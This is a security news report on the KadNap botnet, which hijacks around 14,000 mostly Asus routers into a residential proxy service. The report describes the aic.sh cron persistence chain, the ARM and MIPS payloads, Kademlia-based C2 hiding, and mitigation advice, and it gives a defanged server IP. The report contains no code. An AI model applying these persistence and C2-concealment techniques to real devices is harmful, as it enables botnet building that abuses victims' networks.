A recent discovery has unveiled a malware campaign known as KadNap that has managed to co-opt over 14,000 internet-exposed routers and edge devices into a covert proxy botnet. The primary targets of this campaign appear to be Asus routers, which have been notably affected.
The scale of this campaign is concerning, with more than 60% of the identified victims situated in the United States. Other countries such as Taiwan, Hong Kong, and Russia are also experiencing incidents, highlighting the widespread nature of this threat.
The KadNap campaign first drew attention in early August 2025 when unusual network activity was detected. More than 10,000 Asus devices were observed making connections to a suspicious cluster of servers, which prompted a deeper investigation. Analyses revealed a malicious download chain initiated by a shell script named “aic.sh,” hosted on the IP address 212.104.141[.]140. This script plays a critical role in establishing persistence on the infected devices and orchestrating the delivery of the KadNap malware payload.
The aic.sh script utilizes a cron job scheduled to execute every hour, ensuring that it consistently retrieves a harmful shell script that is subsequently renamed to “.asusrouter” and executed from a specific path. This mechanism effectively allows the malware to maintain its foothold on the device despite any reboots or changes in configuration.
Lumen’s Black Lotus Labs, the organization that identified this operation, reports that it has been active since at least August 2025. The malicious activity facilitated by the KadNap malware is being employed to reroute harmful traffic through compromised home and small office networks on a global scale. Once the malware establishes persistence, it downloads an ELF binary for the router, renaming it to “kad” before execution, which is the KadNap malware itself.
KadNap is equipped to target a variety of devices due to its design, which includes samples for both ARM and MIPS architectures. This broad compatibility allows it to affect numerous consumer and edge networking hardware models, extending beyond just Asus routers.
During the initialization process, the malware catapults itself into action by forking, redirecting input and output to /dev/null, and determining the device’s external IP address. It also synchronizes time with public NTP servers, which are later used to build cryptographic hashes that govern peer-to-peer communications.
An innovative aspect of the KadNap botnet is its proprietary implementation of the Kademlia Distributed Hash Table (DHT) protocol, commonly utilized in applications such as BitTorrent for decentralized look-ups. Through this implementation, KadNap effectively obscures the genuine IP addresses of its command-and-control (C2) servers. The infected devices utilize DHT lookups to discover C2 endpoints, masking their true nature under the guise of benign peer-to-peer traffic. This technique poses significant challenges for security teams attempting to identify and mitigate KadNap’s infrastructure, as traditional measures such as blocklisting are insufficient against such tactics.
Internally, KadNap operates using multiple threads to facilitate its operational logic. One thread is designated to “find peers,” leveraging known BitTorrent bootstrap nodes to create a custom infohash that connects to other KadNap-infected peers. Another thread, termed “contact peers,” reads from a queue of peer IP addresses, establishes connections, and enforces encrypted communication channels for further instructions and payload deliveries.
Despite its sophisticated design, researchers have uncovered a notable vulnerability within KadNap’s unique Kademlia implementation. In a well-functioning Kademlia framework, the pathway to resources should vary over time to reflect true decentralization. However, all analyzed KadNap samples consistently contacted the same two final nodes before reaching the C2 servers, suggesting a fixed structure that gives attackers substantial control over their operations while still masking themselves within a P2P traffic environment.
Once successfully recruited, the KadNap bots are utilized to establish a residential proxy service referred to as “Doppelganger.” This service is reported to serve as a rebranded iteration of the Faceless platform, previously powered by TheMoon malware. The distribution of victims is heavily skewed towards the United States, which accounts for 60% of the infected devices, with smaller percentages spread across Taiwan, Hong Kong, and Russia.
The “Doppelganger” service allows cybercriminals to exploit these hijacked devices as anonymous residential proxies, enabling a range of illicit activities such as brute-force attacks and account takeovers without revealing their true origin.
Lumen’s analysis indicates that KadNap has stabilized at an average of approximately 14,000 distinct infected devices daily, operating three to four active C2 servers at any given time. This situation heightens the security challenges for network defenders, particularly regarding the vulnerabilities of small office/home office (SOHO) and Internet of Things (IoT) devices. Essential actions such as disabling remote administration, applying the latest firmware updates, and enforcing strong router credentials are critical recommendations for mitigating this threat.
In response to the growing threat posed by KadNap, Lumen has taken proactive measures by blocking traffic related to the botnet across its network infrastructure, while also committing to sharing indicators of compromise to aid the broader security community in disrupting this malevolent campaign.